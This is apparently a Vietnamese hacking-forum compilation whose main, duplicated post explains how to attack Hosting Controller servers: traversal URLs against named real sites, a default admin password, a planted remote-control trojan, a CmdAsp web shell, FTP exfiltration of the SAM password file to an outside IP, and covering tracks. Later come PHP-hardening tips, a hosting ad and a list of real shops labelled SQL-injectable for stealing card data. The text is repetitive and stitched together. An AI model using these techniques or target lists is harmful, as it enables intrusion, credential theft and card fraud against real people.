Và lỗi cuối cùng là default password, nếu admin không xoá hay thay đổi user có tên là AdvWebadmin (user default) thì điều này rất nguy hiểm, bởi vì ta có thể nắm quyền điều khiển hoàn toàn server (hay 1 phần) thông qua password default cho user này là "advcomm500349", sau đó thì hack chỉ là việc dễ dàng.
Tiện thể mình cũng chỉ thêm cho các bạn cách cài trojan hoặc 1 chương trình DoS (Denial of Service) vào server mà ban đã vào được để phục vụ cho công việc Hack cho mình sau này. Thường thì khi Hack qua lỗi HC bạn rất khó có thể cài thẳng chương trình vào ổ C:/ như lỗi IIS được. Nhưng chúng ta vẫn có thể cài 1 chương trình nhờ chúng ta setup qua site nằm trong server. Bạn hãy Upload 1 con trojan vào 1 site mà chúng ta muốn (Cách Upload như trên đã nói). Sau đây tôi sẽ cài 1 con reaccserver có chức năng khi cài vào 1 server chúng ta có thể điều khiển server bằng máy tính ở nhà mình. Tôi upload file reaccserver.exe lên site http://123hollywood.com/ .
Bây giờ muốn cài đặt trojan này vào trong server bạn hãy đánh dòng sau :
http://123hollywood.com/reaccserver.exe
Bạn tự hỏi làm sao mà nó có thể cài vào được server mà không qua thông báo ở máy chứ. Đúng, thường thì các phần mềm quản lý Hosting sẽ thông báo ở máy chủ nhưng thường thì người quản lý server sẽ bỏ qua chế độ này khi cài đặt HC Khi bạn đánh dòng trên nếu thành công thì ở IE sẽ thông báo "server setup file full". Nếu không thành công nó sẽ báo "Can't not Found". Lúc này bạn hãy đánh lại :
http://123hollywood.com/../../../reaccserver.exe
Đảm bảo sẽ OK
Chú ý : khi setup file đó thì PC của bạn cũng sẽ bị cài đặt chương trình đó. Bạn
hãy gỡ nó ra . Vừa rồi mình đã cài đặt trojan reaccserver rồi. Bây giờ bạn hãy dùng phần còn lại của chương trình là file cp.exe. Chúng ta có thể Shutdown hoặc Restart server kia. Thường thì server sẽ mất ít nhất 3 phút để khởi động lài .
Bây giờ mình cũng nói thêm về lỗi 1 số Website ở các server cài đặt HC là thường để các file upload.asp nằm ở trong các thư mục của Website. Vì vậy mặc dù lỗi HC có bị fix thì chúng ta cũng Hack như thường .
Đây là ví dụ : http://www.aten2000.com/aspupload_samples_docs/BothFormAndScript.asp Bạn thấy chưa ! Mình có thể upload bất cứ file nào mà mình muốn . Bây giờ mình thử tìm cấu trúc thường c1o của 1 website cài HC nha. Bạn hãy vào đây : http://www.aten2000.com/cmd.asp để xem toàn bộ server với các lệnh dir C:\ ; dir D:\ ; dir E:\ và đọc file bằng lệnh type C:\..[đườngdẫn].. ----> Chú ý : lệnh này có thể đọc được bất cứ file nào .
Bạn thử tìm trong đó mà xem cũng có nhiều lắm .
À khi các bạn vào được server, bạn nên cài 1 file ASP để đọc ổ cứng cho đễ. Đây
là cấu trúc của file cmd.asp :
-----------------------------------------------------------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor mans pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
-------------------------------------------------------------------------------------
NTDaddy có thể download ở đây: ntdaddy download
Ở một số server, không rõ lý do ta phải dùng kết hợp cả cmdasp và ntdaddy mới hiệu quả.
Để khai thác, có 2 nguồn thông tin cực kì quan trọng mà ta cần quan tâm trước tiên, đó là database của HC và file sam._, nơi chứa tất cả các thông tin về các host trên server.
File sam._ thật ra chỉ là bản backup, có thể ko đầy đủ, thường được lưu ở winnt\repair. Bản sam đầy đủ có ở winnt\system32\config, như bị lock, rất khó lấy. Sau khi lấy được sam._, các bạn dùng l0pht hoặc Lc3 (download ở http://www.l0pht.com/ hoặc rất nhiều trên net) để crack.
Còn database của các host, thường lưu trữ ở thư mục cài đặt HC, vd như c:\program files\advanced communitations\NT web hosting\...., là một file access.
Cách download các file như thế nào!? có vài cách cho bạn, nếu bạn biết được vị trí lưu trữ data các host trên server (vd như dạng d:\users\www\democoun\www, địa chỉ này thực chất khi browse trên browser sẽ là http://www.democoun.com/ chẳng hạn - đây chỉ là vd, các bạn phải tự tìm hiểu folder cụ thể, điều này rất quan trọng), bạn có thể dùng lệnh copy, chép thẳng các file này vào thư mục trên, sau đó download thẳng xuống từ browser, như www.democoun.com/sam._ .
Cách khác là dùng ftp để send file mình muốn đến 1 địa chỉ ftp mà mình biết, bằng gõ lệnh trong cmdasp.asp hay nddaddy.asp (Cách này tôi được Kha cung cấp thông tin). Tuy nhiên, ta ko thể nhập và chạy từng lệnh tương tác ftp dùng các trình này được, bạn phải tạo 1 file text có chứa danh sách các lệnh và yêu cầu ftp chạy các lệnh đó. Cách tạo 1 filte text, ta sẽ dùng lệnh echo, xem vd sau:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
sau khi nhập vào textbox lệnh của cmdasp và run, lệnh này sẽ tạo một file c:\dl.txt có chứa lệnh "open 111.214.156.105". Gần tương tự với các lệnh khác, vd lệnh sau sẽ thêm 1 dòng vào sau lệnh open trong file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Lưu ý từ câu lệnh thứ 2 trở đi, ta phải dùng ">>" thay vì ">". Các bạn làm tương tự với các lệnh còn lại, sao cho các lệnh trong dl.txt dùng để send ftp 1 file ít nhất phải có các lệnh sau:
OPEN 111.214.156.105
USER USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
Các lệnh trên sẽ send file c:\sam._ ở server bạn đang hack đến địa chỉ anon 111.214.156.105.
Như vậy, bạn đã tạo xong 1 script để ftp file cần. Bây giờ dùng lệnh sau để thực thi các lệnh trong dl.txt. Trước tiên, bạn chuyển về thư mục chứa dl.txt, dùng lệnh cd c:\, và nhập lệnh sau vào ô lệnh cmdasp: "ftp -n -s:c:\dl.txt" và Run!
Nếu thành công, tức là browser ko báo lỗi và chỉ hiện các thông tin kết nối ftp...thì file sam._ đã được gửi đến địa chỉ anon trên. Bạn chỉ việc ftp vào đó để download về. Sau đó bạn dùng chương trình L0phtCrack để giải mã file SAM đó
Lưu ý là các file bạn copy và download xong, hãy xóa để tránh bị phát hiện.
Muốn tìm các Website bị lỗi Hosting Controller thì bạn vào http://www.google.com rồi gõ : "allinurl:/advadmin" (không có dấu ngoặc kép) nhấn nút Google Search
Như các bạn đã thấy hiện giờ đã xuất hiện rất nhiều máy chủ trên thế giới (theo tôi kiểm tra và thử nghiệm trên 12 server hiện giờ vẫn chưa fix lỗi này) bị lỗi Hostingcontroller.
Hôm nay tôi xin nói về lỗi Hosting controller (HC) này :
Chú ý : Tôi viết bài này chỉ để các bạn học hỏi. Nếu có Hack thì chỉ nên thêm 1 file vào trong website để chứng tỏ là mình đã Hack. Không nên phá hoại làm ảnh hưởng đến nhiều người nha
+ Lỗi HC là lỗi của phần mềm Hosting Controller dùng để quản lý server cung cấp domain và hosting cho khách hàng thường được chạy dưới Win2000/NT. Tôi sẽ Hack qua lỗi HC và sẽ ví dụ với 1 server chưa fix đó là server chứa 38 site mà đã được Hacker Forum Hacked vào tháng trước .
+ Lỗi HC cho bạn thực hiện 1 dòng lệnh để đọc ổ cứng ( C; D; E ) thậm chí cả ổ A
của server qua 1 site hoặc trực tiếp bằng ID của server. Lỗi HC thực chất là bị lỗi của 4 file nằm trong phần mềm là : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp
Tôi sẽ viết cấu trúc của lệnh Hack vào server nhờ lỗi 4 file này :
..................
Trong đó HC có thể là : admin ; advadmin; hostingcontroller
Lỗi đầu tiên tôi giới thiệu với các bạn có tên Multiple security vulnerabilities. Đây là các đoạn Script cho phép bạn duyệt bất cứ file nào trên Server :
http://www.victim.com/advwebadmin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Trong đó Victim là Server bị lỗi HC mà bạn muốn Hack
Tôi sẽ ví dụ các Hack server qua 1 site nằm trong server (hay còn gọi là Hack
local exploit)
VD : site này đã bị Hacker Forum hack : http://123hollywood.com/hf.htm
ở thanh Address bạn đánh 1 trong các dòng lệnh sau :
http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Lúc nãy bạn sẽ vào được phần "Browser Directories". Đây là toàn bộ cấu trúc của Website đó. Khi các bạn đã vào được bên trong của ổ C:\ bạn thấy có thư mục websites (đối với server đang thử nghiệm này, còn đối với các server khác thì nó thường nằm ở ổ D:/) .
Nếu bạn đã thấy thì OK . Bạn hãy vào trong và thấy 1 loạt các website. Với server chúng ta đang Hack ở trên bạn sẽ thấy các website được đưa vào các thư mục riêng lẻ theo vần. Chúng ta hãy tìm tới website mà nhờ nó chúng ta vào dược server này .
Bạn hãy vào 123web/123kinh/123hollywood.com/www/. Bạn thấy đó cực kỳ đơn giản đúng không .
Sau khi biết được đường dẫn của site cần Hack thì bạn dùng Script sau :
http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath= C:\webspace\resadmin\testing\testing.com\www\..\.. \..\..\..\
Thay example bằng tên của Server và testing bằng tên trang Web muốn Hack
Ví dụ : Bạn đăng ký Website tên cuonglong của FPT thì tụi FPT sẽ cho bạn một nơi để trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www
Muốn Hack trang này thì bạn đánh Script như trên :
http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglong&sitename=cuong long.com&OpenPath= C:\webspace\resadmin\cuonglong\cuonglong.com\www\. .\..\..\..\..\
Vậy là bạn đã vào được cấu trúc thư mục của Web đó nhưng lúc này bạn chỉ quyền upload 1 file nào đó từ ổ cứng của bạn lên site đó thôi
Sau đó bạn upload file ntdaddy.asp Website đó. Và chạy file này trên Website đó để lấy những file *.mdb và *.SAM về, đây là file chứa password, bạn chỉ việc giải mã ra
Vậy là bạn đã Hack được Website đó rồi
Bây giờ tôi sẽ hướng dẫn các bạn cách upload và xoá file trên các site này :
Cái này thì cũng cực kỳ đơn giản, bạn hãy xem mẫu sau :
http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath=C:/webspace/..\
trong đó testing là các đường dẫn vào website mà bạn muốn upload ; OK !
Bây giờ thì bạn có thể nghịch thoải mái; Bạn có thể cho toàn bộ site die trong
1 giờ cũng được hi hi ..
Còn 1 vài lỗi nữa của HC, trong đó có lỗi cho phép bạn có khả năng khởi tạo cho mình 1 hosting trong server nhờ dòng lệnh sau :
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
Cũng như trên, Victim là Server bị lỗi HC mà bạn muốn Hack. Ví dụ đó là Website http://bigguy.ourweb.net/
http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.asp
Mình đã khởi tạo cái này, các bác vô xem : http://www.hackerforum.com/
Lỗi này cho phép cho đăng ký free Domain. Bạn hãy đăng ngay 1 Domain cho mình rồi vào http://www.victim.com/AdvAmin/ để Login với với Account vừa đăng ký. Sau khi Login, bạn click vào mục Directories trên menu rồi vào Domain của bạn. Sau đó, bạn hãy upload trang web của mình lên (nơi upload ở dưới cùng) và nhớ là tên trang web đừng dài, rồi click vào logout (ở bên phải trên cùng). Vậy là ta đã đi được nửa chặng đường
Tiếp theo bạn hãy vào : http://www.victim.com/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\username\www.yourdomain.com\www
Bạn hãy thay chữ "username" bằng username lúc đầu bạn đăng ký Domain và thay chữ www.yourdomain.com bằng địa chỉ Domain mà bạn đăng ký và enter. Ví dụ tôi đăng ký 1 Domain tên www.cuonglong.com với username là ncviet ở Website http://bigguy.ourweb.net/ thì tôi sẽ gõ :
http://bigguy.ourweb.net/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\ncviet\www.cuonglong.com\www
Đây là phần Import của Website. Nó sẽ hiện ra 4 khung đường dẫn. Bây giờ bạn hãy tìm trang web của mình ở khung thứ nhất bên dưới và click vào nó rồi nhấn nút "import". Bây giờ nó đã copy trang Web của bạn vào khung thứ hai bên dưới. Ok, vậy là bạn đã Hack xong rồi đó. ví dụ bạn upload file cl.htm thì đường dẫn Web của bạn sẽ là :
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Chú ý : www.victim.com sẽ được thay bằng Website bị lỗi hc. Và có thể trong quá trình hack, server sẽ bắt giữ IP của bạn vì vậy bạn nên ngụy trang cho thật khéo .
Bạn có thể tìm rất nhiều server hiện vẫn còn đang bị lỗi này bằng cách và http://www.google.com rồi nhập từ khoá "Hosting Controller" cho nó Search.
Tiếp theo là một lỗi slash dot dot của HC cho phép ta thấy được đường dẫn các ổ đĩa và các thư mục của server và ta có thể lợi dụng nó để add (thêm vào) một đường dẫn DSN để chỉ tới một địa chỉ mới. Để khai thác lỗi này bạn dùng đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= bspace\opendnsserver\target\target.com\db\..\..\.. \..\
Cái thứ hai là chúng ta có thể thay đổi hoàn toàn hay add vào thư mục admin và thi hành những gì chúng ta muốn. Để khai thác lỗi này chỉ cần đưa vào đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= C:\&oftpPath=C:\
Bạn có thể nắm quyền điều khiển toàn bộ các file trong thư mục (và có thể là cả C:\) và thay đổi tùy thích..
Và lỗi cuối cùng là default password, nếu admin không xoá hay thay đổi user có tên là AdvWebadmin (user default) thì điều này rất nguy hiểm, bởi vì ta có thể nắm quyền điều khiển hoàn toàn server (hay 1 phần) thông qua password default cho user này là "advcomm500349", sau đó thì hack chỉ là việc dễ dàng.
Tiện thể mình cũng chỉ thêm cho các bạn cách cài trojan hoặc 1 chương trình DoS (Denial of Service) vào server mà ban đã vào được để phục vụ cho công việc Hack cho mình sau này. Thường thì khi Hack qua lỗi HC bạn rất khó có thể cài thẳng chương trình vào ổ C:/ như lỗi IIS được. Nhưng chúng ta vẫn có thể cài 1 chương trình nhờ chúng ta setup qua site nằm trong server. Bạn hãy Upload 1 con trojan vào 1 site mà chúng ta muốn (Cách Upload như trên đã nói). Sau đây tôi sẽ cài 1 con reaccserver có chức năng khi cài vào 1 server chúng ta có thể điều khiển server bằng máy tính ở nhà mình. Tôi upload file reaccserver.exe lên site http://123hollywood.com/ .
Bây giờ muốn cài đặt trojan này vào trong server bạn hãy đánh dòng sau :
http://123hollywood.com/reaccserver.exe
Bạn tự hỏi làm sao mà nó có thể cài vào được server mà không qua thông báo ở máy chứ. Đúng, thường thì các phần mềm quản lý Hosting sẽ thông báo ở máy chủ nhưng thường thì người quản lý server sẽ bỏ qua chế độ này khi cài đặt HC Khi bạn đánh dòng trên nếu thành công thì ở IE sẽ thông báo "server setup file full". Nếu không thành công nó sẽ báo "Can't not Found". Lúc này bạn hãy đánh lại :
http://123hollywood.com/../../../reaccserver.exe
Đảm bảo sẽ OK
Chú ý : khi setup file đó thì PC của bạn cũng sẽ bị cài đặt chương trình đó. Bạn
hãy gỡ nó ra . Vừa rồi mình đã cài đặt trojan reaccserver rồi. Bây giờ bạn hãy dùng phần còn lại của chương trình là file cp.exe. Chúng ta có thể Shutdown hoặc Restart server kia. Thường thì server sẽ mất ít nhất 3 phút để khởi động lài .
Bây giờ mình cũng nói thêm về lỗi 1 số Website ở các server cài đặt HC là thường để các file upload.asp nằm ở trong các thư mục của Website. Vì vậy mặc dù lỗi HC có bị fix thì chúng ta cũng Hack như thường .
Đây là ví dụ : http://www.aten2000.com/aspupload_samples_docs/BothFormAndScript.asp Bạn thấy chưa ! Mình có thể upload bất cứ file nào mà mình muốn . Bây giờ mình thử tìm cấu trúc thường c1o của 1 website cài HC nha. Bạn hãy vào đây : http://www.aten2000.com/cmd.asp để xem toàn bộ server với các lệnh dir C:\ ; dir D:\ ; dir E:\ và đọc file bằng lệnh type C:\..[đườngdẫn].. ----> Chú ý : lệnh này có thể đọc được bất cứ file nào .
Bạn thử tìm trong đó mà xem cũng có nhiều lắm .
À khi các bạn vào được server, bạn nên cài 1 file ASP để đọc ổ cứng cho đễ. Đây
là cấu trúc của file cmd.asp :
-----------------------------------------------------------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor mans pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
-------------------------------------------------------------------------------------
NTDaddy có thể download ở đây: ntdaddy download
Ở một số server, không rõ lý do ta phải dùng kết hợp cả cmdasp và ntdaddy mới hiệu quả.
Để khai thác, có 2 nguồn thông tin cực kì quan trọng mà ta cần quan tâm trước tiên, đó là database của HC và file sam._, nơi chứa tất cả các thông tin về các host trên server.
File sam._ thật ra chỉ là bản backup, có thể ko đầy đủ, thường được lưu ở winnt\repair. Bản sam đầy đủ có ở winnt\system32\config, như bị lock, rất khó lấy. Sau khi lấy được sam._, các bạn dùng l0pht hoặc Lc3 (download ở http://www.l0pht.com/ hoặc rất nhiều trên net) để crack.
Còn database của các host, thường lưu trữ ở thư mục cài đặt HC, vd như c:\program files\advanced communitations\NT web hosting\...., là một file access.
Cách download các file như thế nào!? có vài cách cho bạn, nếu bạn biết được vị trí lưu trữ data các host trên server (vd như dạng d:\users\www\democoun\www, địa chỉ này thực chất khi browse trên browser sẽ là http://www.democoun.com/ chẳng hạn - đây chỉ là vd, các bạn phải tự tìm hiểu folder cụ thể, điều này rất quan trọng), bạn có thể dùng lệnh copy, chép thẳng các file này vào thư mục trên, sau đó download thẳng xuống từ browser, như www.democoun.com/sam._ .
Cách khác là dùng ftp để send file mình muốn đến 1 địa chỉ ftp mà mình biết, bằng gõ lệnh trong cmdasp.asp hay nddaddy.asp (Cách này tôi được Kha cung cấp thông tin). Tuy nhiên, ta ko thể nhập và chạy từng lệnh tương tác ftp dùng các trình này được, bạn phải tạo 1 file text có chứa danh sách các lệnh và yêu cầu ftp chạy các lệnh đó. Cách tạo 1 filte text, ta sẽ dùng lệnh echo, xem vd sau:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
sau khi nhập vào textbox lệnh của cmdasp và run, lệnh này sẽ tạo một file c:\dl.txt có chứa lệnh "open 111.214.156.105". Gần tương tự với các lệnh khác, vd lệnh sau sẽ thêm 1 dòng vào sau lệnh open trong file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Lưu ý từ câu lệnh thứ 2 trở đi, ta phải dùng ">>" thay vì ">". Các bạn làm tương tự với các lệnh còn lại, sao cho các lệnh trong dl.txt dùng để send ftp 1 file ít nhất phải có các lệnh sau:
OPEN 111.214.156.105
USER USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
Các lệnh trên sẽ send file c:\sam._ ở server bạn đang hack đến địa chỉ anon 111.214.156.105.
Như vậy, bạn đã tạo xong 1 script để ftp file cần. Bây giờ dùng lệnh sau để thực thi các lệnh trong dl.txt. Trước tiên, bạn chuyển về thư mục chứa dl.txt, dùng lệnh cd c:\, và nhập lệnh sau vào ô lệnh cmdasp: "ftp -n -s:c:\dl.txt" và Run!
Nếu thành công, tức là browser ko báo lỗi và chỉ hiện các thông tin kết nối ftp...thì file sam._ đã được gửi đến địa chỉ anon trên. Bạn chỉ việc ftp vào đó để download về. Sau đó bạn dùng chương trình L0phtCrack để giải mã file SAM đó
Lưu ý là các file bạn copy và download xong, hãy xóa để tránh bị phát hiện.
Muốn tìm các Website bị lỗi Hosting Controller thì bạn vào http://www.google.com rồi gõ : "allinurl:/advadmin" (không có dấu ngoặc kép) nhấn nút Google Search
Ai thích phá quán nét nào ???
Chống Local attack part 1 By LilBuno - Demons Team
đầu tiên login dô root account
các bạn mở file "php.ini" trong pico editor
[ pico /usr/local/lib/php.ini ]
tìm "safe_mode"
[ Ctrl + W and type "safe_mode" ]
đổi Off thành On
[ "safe_mode = Off" to "safe_mode = On" ]
tìm "disabled_functions"
[ Ctrl + W and type "disabled_functions" ]
và add theo functions
[system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source]
thêm hàm này vào nữa Hàm: ini_set();
sau đó save lại
[ Ctrl + X then Y ]
retart lại Apache web server
[ /etc/init.d/httpd restart ]
cách 2
chmod và xet IP
drwxr-x--x 671 root wheel 16296 Aug 14 15:47 /home/
drwx--x--- 14 user nobody 760 Aug 17 08:10 /home/user
drwxr-xr-x 16 user user 1128 Aug 7 01:12 /home/user/public_html
thứ 3 xóa amdincp và modcp
3 cách trên k ai local dc đã thách Pro Xgr và GUG đó là FOr ML !!!! đến h Vẫn chưa ai Local dc
done. bây h hết sợ hack local rồi nhá )
chú ý nên backup php.ini trước khi bắt đầu.
các bạn mở file "php.ini" trong pico editor
[ pico /usr/local/lib/php.ini ]
tìm "safe_mode"
[ Ctrl + W and type "safe_mode" ]
đổi Off thành On
[ "safe_mode = Off" to "safe_mode = On" ]
tìm "disabled_functions"
[ Ctrl + W and type "disabled_functions" ]
và add theo functions
[system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source]
thêm hàm này vào nữa Hàm: ini_set();
sau đó save lại
[ Ctrl + X then Y ]
retart lại Apache web server
[ /etc/init.d/httpd restart ]
cách 2
chmod và xet IP
drwxr-x--x 671 root wheel 16296 Aug 14 15:47 /home/
drwx--x--- 14 user nobody 760 Aug 17 08:10 /home/user
drwxr-xr-x 16 user user 1128 Aug 7 01:12 /home/user/public_html
thứ 3 xóa amdincp và modcp
3 cách trên k ai local dc đã thách Pro Xgr và GUG đó là FOr ML !!!! đến h Vẫn chưa ai Local dc
done. bây h hết sợ hack local rồi nhá )
chú ý nên backup php.ini trước khi bắt đầu.
host free chất 100GB Diskspace - Unlimited BW
dành cho nb nhé. pro đi chổ khác chơi kẻo nát đít.
site chất ko ngon ko lấy tiền
Free Shared Hosting Account
All the hosting you could want.
100GB disc Space
Unmetered BW
Unlimited FTP Accounts
Unlimited MySQL account
tường lửa
################################################## ################################################## ################################################## ##############
##########################
#################################
######################################
http://www.freegigs.co/clients/cart.php
Nguon VHU
List shop lỗi SQLi cho ae get cc new update
http://www.weatherguard.com/truck_tool_boxes/view_products.php?subcat_id=18 http://www.yarbroughsmusic.com/section.php?sectionID=3 http://www.martincooper.com.au/index.php?option=com_phocagallery http://www.johnpeelcentreforcreativearts.co.uk/index.php?option=com_k2 http://www.foodpartners.com.au/foodpartners/index.php?inc=home http://www.cardsuggest.com/index.php/walmart_money_card.html?call=default http://ww2.providenthp.com/index.php?option=com_project http://chemwiki.ucdavis.edu/index.php?title=VVV_Demos/Additional_Demos/An_Analogy_for_Elements_Versus_Mixtures_Versus_Compounds http://www.wecarejacksonville.org/index.php?/about?id=1 http://www.fembotwiki.com/index.php?title=Main_Page http://www.steam-brite.com/equipment/portable_extractors/century400.php?id=1 http://hollywoodism.net/index.php?option=com_k2 http://www.liberalhistory.org.uk/item_single.php?item_id=4 http://www.innovateonline.info/index.php?view=article http://www.gsm4voip.com/index.php?option=com_k2 http://hedbib.iau-aiu.net/login.php?lang=en http://theafricareport.com/Blog/index.php?post/2009/09/15/Kenyan-higher-education-is-a-luxury-for-the-poor%2C-a-commodity-for-the-rich?id=1 http://www.golocaljamaica.com/readarticle.php?ArticleID=2457 http://www.into-asia.com/thai_language/how_to_speak_thai.php?id=1 http://www.fishbase.org/search.php?lang=English http://www.ibdb.com/person.php?id=57772 http://pbskids.org/toopyandbinoo/index.php?ID=MAGC3JEU3 http://college-graduation-announcements.signaturea.com/index.php?page=category http://www.hazelwoodmo.org/index.php?view=venueevents http://www.rainwater-toolkit.net/index.php?id=21 http://www.school-video-news.com/index.php?option=com_content http://www.oklahomacitynationalmemorial.org/secondary.php?section=2 http://www.aviointeriors.it/index.php?option=com_k2 http://www.a-bike.co.uk/store/home.php?id=1 http://www.medeco.com/index.php?option=com_content http://www.syriantalent.com/job-details.php?jo_id=1507 http://www.magnoliahomes.net/index.php?id=3 http://www.amnesty.ca/atrisk/index.php/father-alejandro-solalinde/?id=1 http://www.qmsonline.com/index.php?view=items http://www.hoertechnik-audiologie.de/web/file/Forschung/Software.php?id=1 http://www.beyondcredentials.com/index.php?option=com_lyftenbloggie http://www.gigaprint.co.uk/product.php?nid=16 http://www.alexandrahospital.org.au/index.php?page=organisational-structure http://www.awtrey.com/tutorials/dbeweb/database.php?id=1 http://www.cachecounty.org/auditor/proceed.php?id=1 http://www.bellegrove.org/index.php?/calendar?id=1 http://www.millerandsmith.com/index.php?component=community http://aabe.org/index.php?component=pages http://openclassroom.stanford.edu/MainFolder/CoursePage.php?course=PracticalUnix http://www.theblackvault.com/wiki/index.php/Reptilian_humanoid?id=1 http://theindustryexposed.com/index.php?option=com_k2 http://unfccc4.meta-fusion.com/kongresse/cop17/templ/ovw_onDemand.php?id_kongressmain=201 http://schoolmarm.org/main/index.php?page=p-genphil http://www.gratitudecampaign.org/index.php?c=pages http://www.timingcharts.com/index.php?id=1 http://www.weahunter.com.au/index.php?show_section_id=16 http://www.drazam.com/index.php?p=1_8_Education-Teaching-Programme http://www.jtj.com.au/index.php?option=com_sectionex http://www.altsupportthyroid.org/tsh.php?id=1 http://jettent.com/index.php?option=com_improducts http://www.bristowgroup.com/careers/positions.php?id=1 http://www.costaricamap-online.com/php/map01/map0101.php?id=1 http://www.societyofrobots.com/robotforum/index.php?id=1 http://redcatjazzcafe.com/index.php?id=1 http://www.preventioninstitute.org/index.php?option=com_jlibrary http://www.dia.uniroma3.it/~compunet/www/view/person.php?id=gdb http://www.iftomm.org/index.php?option=com_iftommmembers http://www.bbmmlsu.in/index.php?option=com_k2 http://22q.org/22q_zoo.php?id=1 http://santaclarita.taptogo.net/main.php?cn=santaclarita http://www.fujifilmimagine.com/imagine/app.php?userGroupID=162 http://devspade.com/index.php/2011/02/17/getting-to-hello-world-ruby-on-rails-on-windows/?id=1 http://www.collegepharmacy.com/index.php?/site/detail/biologically_identical_hrt?id=1 http://www.wmsr.com/attraction.php?attraction=273 http://www.lamayeshe.com/index.php?sect=article http://sexynepaligirls.com/index.php?option=com_phocagallery http://www.lingsmoment.com/index.php?id=1 http://www.loosco.com/index.php?page=loos-hardware http://www.totalescape.com/destin/california-towns.php?tid=214 http://www.icprofessor.com/index.php?id=1 http://www.cutlerhomes.com/getagent/list.php?oid=000500001 http://onepiece.viz.com/volumes/product.php?volume=32 http://needtoknow.nas.edu/energy/energy-sources/emerging-technologies/conventional-oil-alternatives.php?id=1 http://cloverfield.despoiler.org/index.php?title=Slusho http://healthwyze.org/index.php/eliminating-parasites.html?id=1 http://www.countrycodes.com/search_usa.php?t=250 http://www.sbig.com/news.php?id=1 http://remoteplanet.co.uk/products.php?product=Attacker-1%7B47%7D8-Nitro-Rc-Buggy-%252d-Remote-Starter-Version http://www.bulldawgmfg.com/index.php?option=com_ixxocart http://www.heteroptera.ucr.edu/index.php?option=com_content http://www.thepoultrysite.com/forums/showthread.php?t=730 http://steppingup.ysf-fsj.ca/index.php/Different_graphs_for_different_purposes?id=1 http://www.freshjoomlatemplates.com/wp-content/plugins/download-monitor/download.php?id=24 http://forums.smallbusinesscomputing.com/showthread.php?t=497 http://www.charlestoncoffeeroasters.com/v.php?pg=12 